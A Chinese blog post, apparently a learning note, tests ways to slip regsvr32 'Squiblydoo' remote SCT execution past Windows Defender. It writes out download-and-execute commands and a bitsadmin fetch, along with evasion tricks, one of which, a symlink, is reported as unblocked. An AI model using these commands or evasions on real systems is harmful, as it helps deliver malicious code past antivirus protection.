前言:看了这篇突然想起,2019年刚开始学习的时候在心东的视频教程中,他当时在360的情况下绕Regsvr32跟这篇文章也有点相似,不过这个人的思路更加的广阔!

支持操作系统:Windows Vista,Windows 7,Windows 8,Windows 8.1,Windows 10

所需要的权限:用户

先介绍下Regsvr32,是个二进制文件,可用于执行外部SCT文件中的代码!

参数讲解:

/u:反注册DLL文件

/i:在使用 /u 反注册时调用 DllInstall

/s:安静模式下执行命令,即在成功注册/反注册DLL文件前提下不显示结果提示框

/c:控制端口

/n:不调用DllRegisterServer,必须与/i连用

DllInstall:仅用于应用程序安装和设置。应用程序不应调用它。它的用途与DllRegisterServer或DllUnregisterServer相似。与这些函数不同,DllInstall使用一个输入字符串,该字符串可用于指定各种不同的操作。这允许根据任何适当的条件以多种方式安装DLL。

大家可以理解DllInstall的时候可以带命令行参数进行注册,那么也可以进行自定义的操作,例如远程调用!

这里主要学习总结绕过手段,如果需要详细图文学习的话,参考最下面的文章!

标准的运行命令格式:regsvr32.exe /i:http://example.com/file.sct /u /s scrobj.dll,这个结果是会被Windows Defender进行拦截的!

绕过过程如下:

第一种尝试方法:命令参数的交换

/u /s 前后交换

regsvr32.exe /i:http://example.com/file.sct /s /u scrobj.dll 拦截

结果无法绕过

第二种尝试方法:添加干扰符

这里使用的干扰符只有"^,自己知道的还有个@

regsvr32.exe /i:h^t^t^p://example.com/file.sct /s /u scrobj.dll 拦截

regsvr32.exe /i:h"t"t"p://example.com/file.sct /s /u scrobj.dll 拦截

第三种尝试方法:绕过windows目录调用,该方法对于某些av监控windows目录下的exe文件有一定的绕过作用!

copy c:\windows\system32\regsvr32.exe c:\programdata\reg32.exe

reg32.exe /i:http://example.com/file.sct /s /u scrobj.dll 拦截

copy c:\windows\system32\scrobj.dll Myscrobj.dll

regsvr32.exe /i:http://example.com/file.sct /s /u Myscrobj.dll 拦截

第四种尝试方法:特征码修改

这里自己理解的特征码修改实际上就是指的就是 引起AV检测的字符

regsvr32.exe /i:http://example.com/file.txt /s /u scrobj.dll 拦截

regsvr32.exe /i:http://example.com/file.txt scrobj.dll 拦截

regsvr32.exe /i:http:// scrobj.dll 拦截

regsvr32.exe /i:http: scrobj.dll 拦截

regsvr32.exe /i:ftp: scrobj.dll 不拦截

regsvr32.exe /i:http: Myscrobj.dll 不拦截

那么可以确定的是 拦截情况为:httpscrobj.dll的组合

第五种尝试方法:符号链接

权限要求:本地管理员

在linux中有软链接和硬链接,在windows中也有类似的操作符号链接

Mklink.exe c:\programdata\Myscrobj.dll c:\windows\system32\scrobj.dll

regsvr32.exe /i:http://example.com/file.sct /u /s Myscrobj.dll 不拦截,但是记得操作的时候在链接的dll目录下进行!

第六种尝试方法:数据流(ADS)

dir /R可以去发现本地的备用数据流

默认情况下,我们查看称为$DATA的特定流。可以向文件中添加其他流并向其中添加内容。

Type c:\windows\system32\scrobj.dll > test.txt:Myscrobj.dll

Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct test.txt:Myscrobj.dll 拦截

第七种尝试方法:本地磁盘执行

那么也就是下载到本地然后进行执行,不去远程执行!

bitsadmin /transfer download /download /priority normal https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct %TEMP%\test.txt && regsvr32.exe /s /u /i:%TEMP%\test.txt scrobj.dll 拦截

太棒了,屁都没学到!

参考文章:https://www.trustedsec.com/blog/discovering-the-anti-virus-signature-and-bypassing-it/

DISCOVERING THE ANTI-VIRUS SIGNATURE AND BYPASSING IT的更多相关文章

  1. BlackArch-Tools

    BlackArch-Tools 简介 安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 ...

  2. Automated Memory Analysis

    catalogue . 静态分析.动态分析.内存镜像分析对比 . Memory Analysis Approach . volatility: An advanced memory forensics ...

  3. QUICK START GUIDE

    QUICK START GUIDE This page is a guide aimed at helping anyone set up a cheap radio scanner based on ...

  4. cygwin 扩展

    1.使用setup,然后一路安装到select package,选择需要的包即可,然后一路next. 2.setup.exe -q -P 包名, 详细用法如下: Command Line Option ...

  5. linux下安装F-prot杀毒软件

    一. f-prot的安装 1.首先我们要创建一个带有超级权限的用户 sudo passwa root 2.su 切换用户 3.下载F-prot http://www.f-prot.com/downlo ...

  6. Mysql Communications link failure 问题的解决

    问题现象 com.mysql.jdbc.exceptions.jdbc4.CommunicationsException: Communications link failure The last p ...

  7. 使用JMeter3.0实战之分布式并发测试以及web API接口测试

    简介: 该文档是以Apche JMeter-3.0为例进行编写的,通过网上的学习资料和官方文档的说明手册学习后,进行项目操作实践,将测试的过程记录下提供给大家学习. 本博文的内容主要是进行配置JMet ...

  8. jmeter工具下载及工具功能操作介绍

     本博文jmeter介绍的是在windows下使用,linux后期看情况更新,谢谢 简单介绍,想更多了解的去官方,多的很: The Apache JMeter™ application is open ...

  9. Bypassing iPhone Code Signatures

    [Bypassing iPhone Code Signatures] Starting with the recent beta releases of the iPhoneOS, Apple has ...

随机推荐

  1. python爬虫(六) Cookie

    什么是Cookie 在网站中,http的请求通常是无状态的(第一个和服务器连接并且登录之后,此时服务器知道是哪个用户,但是当第二次请求服务器时,服务器依然不知道当前请求的是哪个用户),cookie就是 ...

  2. 我的学习经历——Linux系统入门教程

    我想把最近学习Linux的经验和过程分析出来,当时是在上大三,是学生一枚,以前对开源也没有什么特殊的认识,只觉得很高深,不明觉厉的东西,在当时因为学校要参加职业技能大赛,其中有一团体性质的比赛,几个同 ...

  3. zabbix通过ipmi传感器监控浪潮服务器的硬件信息

    一:实验对象 操作系统版本:centos7.6 监控对象:通过服务器传感器获取到的所有在使用的硬件信息 zabbix版本: 4.0.14二:zabbix介绍 zabbix适合中小型企业.大型企业的用户 ...

  4. android studio升级之后项目报错Could not find com.android.tools.build:aapt2:3.2.1-4818971

    导致问题的原因为源代码根目录下的build.gradle中缺少对于google源服务器的配置(话说,貌似以前版本的都在jcenter中可以找到,最新版本的,好像没有上传到jcenter服务器了,估计是 ...

  5. MySQL操作之DDL

    目录 SQL语句的分类 DDL语句 SQL语句的分类 DDL(Data Definition Languages)语句:数据定义语言.这些语句定义了不同的数据段. 数据库.表.列.索引等数据库对象的定 ...

  6. java并发之Future与Callable使用

    java并发之Future与Callable使用 这篇文章需要大家知道线程.线程池的知识,尤其是线程池. 有的时候我们要获取线程的执行结果,这个时候就需要用到Callable.Future.Futur ...

  7. github默认端口22被占用,ssh: connect to host github.com port 22: Connection timed out

    出现github 连接错误: ssh:connect to host github.com port 22:Connection timed out 刚开始以为是网络问题,github不能连接上,但是 ...

  8. Kubernetes——YAML文件

    kubernetes——yaml文件的编写yaml文件的结尾后缀名.yaml或者.yml都能够识别.yaml文件就像脚本一样,可以放在任意的位置.编写yaml文件需要用到的帮助手册的查看: kubec ...

  9. Day3-C-Radar Installation POJ1328

    Assume the coasting is an infinite straight line. Land is in one side of coasting, sea in the other. ...

  10. 使用Spring Cloud Gateway保护反应式微服务(二)

    抽丝剥茧,细说架构那些事——[优锐课] 接着上篇文章:使用Spring Cloud Gateway保护反应式微服务(一) 我们继续~ 将Spring Cloud Gateway与反应式微服务一起使用 ...